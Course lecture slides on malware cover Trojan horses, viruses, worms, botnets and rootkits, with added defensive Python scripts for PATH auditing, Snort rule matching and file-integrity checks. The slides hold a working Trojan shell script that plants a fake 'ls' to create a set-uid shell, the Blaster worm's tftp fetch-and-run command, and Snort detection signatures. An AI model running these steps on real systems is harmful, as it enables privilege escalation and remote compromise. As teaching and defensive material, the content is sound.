Operating Systems Principles

Academic year: 2021


(1)

Malware

CSC501

(2)

A Quick Recap

- Previous lecture: Code Injection Attacks
- Today: Malware

(3)

What is Malicious Software?

- Malicious Software (a.k.a. Malware)
  - Software designed to infiltrate or damage a computer system, without the owner's informed consent
    -- http://en.wikipedia.org/wiki/Malware
  - Examples: viruses, worms, Trojan horses, spyware, and other malicious and unwanted software
  - How about adware?
- Malware references the intent of the creator, rather than any particular features

(4)

Why should we care?

- Malware remains a top threat

[Figure: chart labelled Blaster, Nimda, CodeRed (Source: Symantec Internet Security Threat Report); Conficker Worm Infection Map (as of 4/1/09) from CWG]

(5)

- Recruiting Vulnerable Nodes -> Attack Network
  - Zero-day exploits w/o software patches
  - New attack strategies
    - Exploiting vulnerable client-side software, such as IE
    - Propagating malware with RFID tags, cell phones, ...
  - Fast, massive replications
- Providing “Value-Added” Services
  - DDoS, spamming, or other malicious purposes ...
  - Sell/rent attack networks for profit

(6)

Taxonomy of Malicious Software

[Figure: taxonomy tree of Malicious Programs. One branch needs a host program: backdoors, logic bombs, Trojan horses, viruses. The other branch is independent: worms, zombies. Viruses and worms are marked as the ones that replicate. Rootkits are shown alongside.]

(7)

Backdoor

- Secret entry point into a system
  - Specific user identifier or password that circumvents normal security procedures
- Commonly used by developers

(8)

Logic Bomb

- Embedded in legitimate programs
- Activated when specified conditions are met
  - E.g., presence/absence of some file; particular date/time or particular user
- When triggered, typically damages the system

(9)

Trojan Horse

- Attacker:

    cat >/homes/victim/ls <<eof      # plant a fake "ls" where the victim will run it
    cp /bin/sh /tmp/.xxsh            # hidden effect: copy a shell ...
    chmod u+s,o+x /tmp/.xxsh         # ... and make it set-uid to the victim
    rm ./ls                          # remove the fake ls so nothing looks amiss
    ls $*                            # expected effect: run the real ls
    eof

- Victim:

    ls

- Program with an expected and a hidden effect
  - Appears normal/expected
  - Hidden effect violates security policy
- User tricked into executing the Trojan horse
  - Expects (and sees) expected behavior
  - Hidden effect performed
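The Trojan above only works because the victim's search path lets a file dropped in the current directory shadow /bin/ls, and it leaves a set-uid shell behind in /tmp. The following Python script, added here as an example and not part of the lecture slides, audits a PATH value for entries that allow such shadowing and scans a directory tree for set-uid files; the temporary directory and planted ".xxsh" file it builds are constructed for the demo.

```python
"""Defensive checks for the PATH-shadowing Trojan horse (added example).

Two things a defender can look for: PATH entries that let an attacker's file
be picked up instead of a system binary, and set-uid files left behind in
world-writable directories such as /tmp.
"""
import os
import stat
import tempfile


def risky_path_entries(path_value):
    """Return (entry, reason) pairs for PATH entries that allow command shadowing.

    An empty entry or "." means the current directory is searched, so a file
    named "ls" placed there can be run instead of /bin/ls. Relative entries
    resolve differently in every working directory. World-writable directories
    without the sticky bit let any user replace the binaries inside them.
    """
    findings = []
    for entry in path_value.split(os.pathsep):
        if entry in ("", "."):
            findings.append((entry or "<empty>", "current directory is searched"))
        elif not entry.startswith("/"):
            findings.append((entry, "relative entry depends on the working directory"))
        elif os.path.isdir(entry):
            mode = os.stat(entry).st_mode
            if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
                findings.append((entry, "world-writable without sticky bit"))
    return findings


def is_setuid_mode(mode):
    """True when st_mode carries the set-uid bit (the u+s from the Trojan)."""
    return bool(mode & stat.S_ISUID)


def setuid_files(directory):
    """Return sorted paths of regular set-uid files under `directory`.

    lstat is used so a symlink to a legitimate set-uid binary is not reported.
    """
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # raced with deletion; skip
            if stat.S_ISREG(st.st_mode) and is_setuid_mode(st.st_mode):
                hits.append(path)
    return sorted(hits)


def demo():
    """Constructed scenario: a scratch directory holding one planted set-uid
    shell copy (".xxsh", as in the slide) and one harmless file.
    Returns (files_found, planted_path) so a caller can compare them."""
    scratch = tempfile.mkdtemp(prefix="trojan-demo-")
    planted = os.path.join(scratch, ".xxsh")
    with open(planted, "w") as f:
        f.write("#!/bin/sh\n")          # stand-in for the copied /bin/sh
    os.chmod(planted, 0o4755)           # u+s,o+x as in the Trojan
    harmless = os.path.join(scratch, "notes.txt")
    open(harmless, "w").close()
    return setuid_files(scratch), planted


if __name__ == "__main__":
    for entry, reason in risky_path_entries(os.environ.get("PATH", "")):
        print(f"risky PATH entry {entry!r}: {reason}")
    found, planted = demo()
    print("set-uid files in scratch dir:", found, "(planted:", planted + ")")
```

The PATH check deliberately reports "." wherever it appears, not only when it precedes /bin: a user who runs `ls` from a directory an attacker can write to is exposed as soon as "." is searched at all.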

(10)

Virus

- Self-replicating code
  - Alters normal code with “infected” version
  - Generally tries to remain undetected
- Operates when infected code is executed

    if spread condition then
        for each target file:
            if not infected then alter it to include the virus
    perform malicious action

(11)

Worm

- Runs independently
  - Does not require a host program
- Propagates a fully working version of itself to other machines
- Carries a payload performing hidden tasks
  - Backdoors, spam relays, DDoS agents, ...
- Phases

(12)

Worm Propagation

[Diagram: A Worm -> A Victim]

1. Target Probing
2. Vulnerability Exploitation
3. Replication

(13)

MSBlast Worm (Aug., 2003)

[Diagram: Blaster at 192.168.0.1 attacking Target/RPC at 192.168.10.11]

1. Exploits target on port 135/TCP
2. Binds svchost.exe to port 4444/TCP via injected code
3. Connects to target on port 4444/TCP
4. Creates a shell “cmd.exe” and binds it to port 4444/TCP
5. Creates “TFTP Server” on port 69/UDP
6. Sends “TFTP” command to shell:
       >tftp -I 192.168.0.1 GET msblast.exe
7. Runs TFTP command; “teleports” msblast.exe file
8. Sends “START msblast.exe” command
9. Runs worm on target!
10. Closes connection
11. Shell closes

Snort signature:

alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)


(14)

Example II: Lion/Linux Worm

[Diagram: Lion at 192.168.0.1 attacking Target/BIND at 192.168.10.11]

1. Checks reachability by connecting to 53/TCP
2. Exploits target on port 53/TCP
3. Runs a shell command
4. Runs worm on target!
3. Replicates worms on port 27374/TCP

Snort signatures:

alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named tsig overflow attempt"; flow:to_server,established; content:"|AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 00 01 20 20 20 20 02 61|"; reference:cve,CVE-2001-0010; …)


alert tcp $HOME_NET any -> $EXTERNAL_NET 27374 (msg:"MISC Lion worm"; flow:to_server,established; content:"GET "; depth:8; nocase; sid:514;…)

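The Snort rules on the Blaster and Lion slides each rely on one content test; reading them is easier once you see how `content`, `depth` and `nocase` are applied to a payload. The script below, added here as an example (it is neither the slides' code nor Snort), parses both rules as printed above (with the elided trailing options dropped) and runs their content test over three constructed packets. Packet names, the sample payload bytes and the `scan` interface are assumptions of this example.

```python
"""Minimal Snort-style content matcher for the Blaster and Lion rules (added example)."""

# Rule text copied from the slides; the elided options ("…") are omitted.
BLASTER_RULE = ('alert ip $EXTERNAL_NET any -> $HOME_NET 135 '
                '(msg:"RPC DCOM exploit/ Blaster Worm Attack"; '
                'content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 '
                '3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |";)')
LION_RULE = ('alert tcp $HOME_NET any -> $EXTERNAL_NET 27374 '
             '(msg:"MISC Lion worm"; flow:to_server,established; '
             'content:"GET "; depth:8; nocase; sid:514;)')


def decode_content(text):
    """Snort content syntax: text outside |...| is literal, inside is hex bytes."""
    out = bytearray()
    for i, part in enumerate(text.split("|")):
        out += bytes.fromhex(part) if i % 2 else part.encode("latin-1")
    return bytes(out)


def parse_rule(rule):
    """Parse the header and option list into a dict.

    Simplification: options are split on ';', so a content string that itself
    contains ';' would need a proper tokenizer. Only one content per rule."""
    header, _, body = rule.partition("(")
    action, proto, src, sport, _arrow, dst, dport = header.split()
    parsed = {"action": action, "proto": proto, "src": src, "sport": sport,
              "dst": dst, "dport": dport, "content": b"", "depth": None,
              "nocase": False, "msg": "", "sid": None, "flow": ""}
    for opt in body.rstrip(")").split(";"):
        key, _, val = opt.strip().partition(":")
        val = val.strip().strip('"')
        if key == "content":
            parsed["content"] = decode_content(val)
        elif key == "depth":
            parsed["depth"] = int(val)
        elif key == "nocase":
            parsed["nocase"] = True
        elif key == "sid":
            parsed["sid"] = int(val)
        elif key in ("msg", "flow"):
            parsed[key] = val
    return parsed


def payload_matches(rule, payload):
    """Content must lie entirely within the first `depth` bytes (whole payload
    when no depth is given); nocase compares case-insensitively."""
    window = payload if rule["depth"] is None else payload[:rule["depth"]]
    needle = rule["content"]
    if rule["nocase"]:
        window, needle = window.lower(), needle.lower()
    return needle in window


def scan(rules, packets):
    """Return (packet name, rule msg) for every rule each packet triggers.

    A packet is a dict with name, proto, dport and payload. 'ip' rules match
    any transport protocol. Direction, flow state and $HOME_NET membership
    are not modelled here."""
    alerts = []
    for pkt in packets:
        for rule in rules:
            proto_ok = rule["proto"] in ("ip", pkt["proto"])
            port_ok = rule["dport"] in ("any", str(pkt["dport"]))
            if proto_ok and port_ok and payload_matches(rule, pkt["payload"]):
                alerts.append((pkt["name"], rule["msg"]))
    return alerts


def demo():
    """Constructed traffic: a Lion-style replication request (lower-case verb,
    caught by nocase), a request whose 'GET ' starts past the 8-byte depth,
    and an RPC payload carrying the Blaster byte sequence."""
    rules = [parse_rule(BLASTER_RULE), parse_rule(LION_RULE)]
    blaster_bytes = rules[0]["content"]
    packets = [
        {"name": "lion", "proto": "tcp", "dport": 27374,
         "payload": b"get /worm.tgz HTTP/1.0\r\n"},
        {"name": "late-get", "proto": "tcp", "dport": 27374,
         "payload": b"XXXXXXXXGET /x HTTP/1.0\r\n"},
        {"name": "rpc", "proto": "tcp", "dport": 135,
         "payload": b"\x00" * 16 + blaster_bytes + b"\x00" * 8},
    ]
    return scan(rules, packets)


if __name__ == "__main__":
    for name, msg in demo():
        print(f"{name}: {msg}")
```

The "late-get" packet shows what `depth:8` buys: the rule only fires when "GET " begins inside the first eight bytes, which keeps it from matching every HTTP request that merely mentions the verb later on.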

(15)
(16)

Zombie

- Secretly takes over another networked computer by exploiting software flaws
- Builds the compromised computers into a zombie network or botnet
- Uses it to indirectly launch attacks

(17)

Detailed Steps (1)

[Diagram repeated across slides 17-22: Attacker, Internet, Unsecured Computers / Zombies, Master Server, Targeted System, User]

1. Attacker scans Internet for unsecured systems that can be compromised

(18)

Detailed Steps (2)

2. Attacker secretly installs zombie agent programs, turning unsecured computers into zombies

(19)

Detailed Steps (3)

3. Zombie agents “phone home” and connect to a master server

(20)

Detailed Steps (4)

4. Attacker sends commands to Master Server to launch a DDoS attack against a targeted system

(21)

Detailed Steps (5)

5. Master Server sends signal to zombies to launch attack on targeted system

(22)

Detailed Steps (6)

6. Targeted system is overwhelmed by zombie requests, denying requests from normal users (User: Request Denied)

(23)

Rootkit

- “A rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence on a computer”
- Goals:
  - Hide malicious resources (e.g., processes, files, registry keys, open ports, etc.)

(24)

[Banner: “Linux RootKit III” in ASCII art]

Program     Status          Purpose
ls          Trojaned!       Hide files
du          Trojaned!       Hide files
ifconfig    Trojaned!       Hide sniffing
netstat     Trojaned!       Hide connections
chfn        Trojaned!       User->r00t
chsh        Trojaned!       User->r00t
inetd       Trojaned!       Remote access
login       Trojaned!       Remote access
passwd      Trojaned!       User->r00t
ps          Trojaned!       Hide processes
top         Trojaned!       Hide processes
rshd        Trojaned!       Remote access
syslogd     Trojaned!       Hide logs
linsniffer  Packet sniffer!
fix         File fixer!
z2          Zap2 utmp/wtmp/lastlog eraser!
wted        wtmp/utmp editor!
lled        lastlog editor!
bindshell   port/shell type daemon!

(25)

Rootkit

- Simple rootkits:
  - Modify user programs (ls, ps)
  - Detectable by tools like Tripwire
- Sophisticated rootkits:
  - Modify the kernel itself
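Slide 25 says that rootkits which replace user programs such as ls and ps are detectable by tools like Tripwire, and the virus on slide 10 likewise alters executables on disk. The script below, added here as an example and not Tripwire's or the lecture's own code, shows the principle: record a baseline of hash, size and permission bits for monitored files, then re-check and report which attributes changed. The scratch directory, the two stand-in "binaries" and the rewritten ls are constructed for the demo.

```python
"""Tripwire-style file-integrity baseline and check (added example)."""
import hashlib
import os
import tempfile


def file_digest(path):
    """SHA-256 of a file's contents, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def fingerprint(path):
    """Attributes to baseline: content hash, size and permission bits.
    A Trojaned ls changes the first two; a newly set-uid binary changes mode."""
    st = os.lstat(path)
    return {"sha256": file_digest(path), "size": st.st_size, "mode": st.st_mode & 0o7777}


def build_baseline(paths):
    """Map each monitored path to its fingerprint."""
    return {p: fingerprint(p) for p in paths}


def check_baseline(baseline):
    """Return {path: [changed attribute, ...]} for files that differ from the
    baseline; a vanished file is reported as ['missing']. Unchanged files are
    omitted so the report is empty on a clean system."""
    findings = {}
    for path, expected in baseline.items():
        if not os.path.lexists(path):
            findings[path] = ["missing"]
            continue
        current = fingerprint(path)
        changed = [attr for attr in expected if expected[attr] != current[attr]]
        if changed:
            findings[path] = changed
    return findings


def demo():
    """Constructed scenario: baseline fake 'ls' and 'ps', then overwrite 'ls'
    the way an application-level rootkit would. Returns the check report."""
    scratch = tempfile.mkdtemp(prefix="integrity-demo-")
    ls_path = os.path.join(scratch, "ls")
    ps_path = os.path.join(scratch, "ps")
    for path in (ls_path, ps_path):
        with open(path, "wb") as f:
            f.write(b"#!/bin/sh\nexec /bin/true\n")   # stand-in for a real binary
        os.chmod(path, 0o755)
    baseline = build_baseline([ls_path, ps_path])
    # "Trojan" ls: same name and mode, different contents.
    with open(ls_path, "wb") as f:
        f.write(b"#!/bin/sh\n# trojaned: would hide files here\nexec /bin/true\n")
    return check_baseline(baseline)


if __name__ == "__main__":
    for path, changed in demo().items():
        print(f"{path}: changed {', '.join(changed)}")
```

Two caveats follow directly from the slides. The baseline must live somewhere the intruder cannot rewrite (read-only media or another host), or a rootkit simply updates it along with ls. And the check is only as honest as the kernel that serves the bytes: the kernel-level and under-kernel rootkits on the next slides leave every user program, Tripwire included, intact and lie to them instead.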

(26)

Rootkit Classification

[Figure: three layered diagrams, each with the kernel at the bottom and user programs above it]

- Application-level Rootkit (I): good kernel; login, ps and ifconfig are Trojaned; tripwire is good
- Kernel-level RootKit: login, ps, ifconfig and tripwire are all good, but a Trojan kernel module sits inside the kernel (Shadow Walker, adore)
- Application-level Rootkit (II): good kernel and untouched good programs, with a separate evil program running alongside them (Hxdef, NTIllusion)

(27)

Rootkit Classification

- Under-Kernel RootKit: the kernel and all programs (login, ps, ifconfig, tripwire) are good, but they run on top of an evil VMM

(28)

Next Lecture
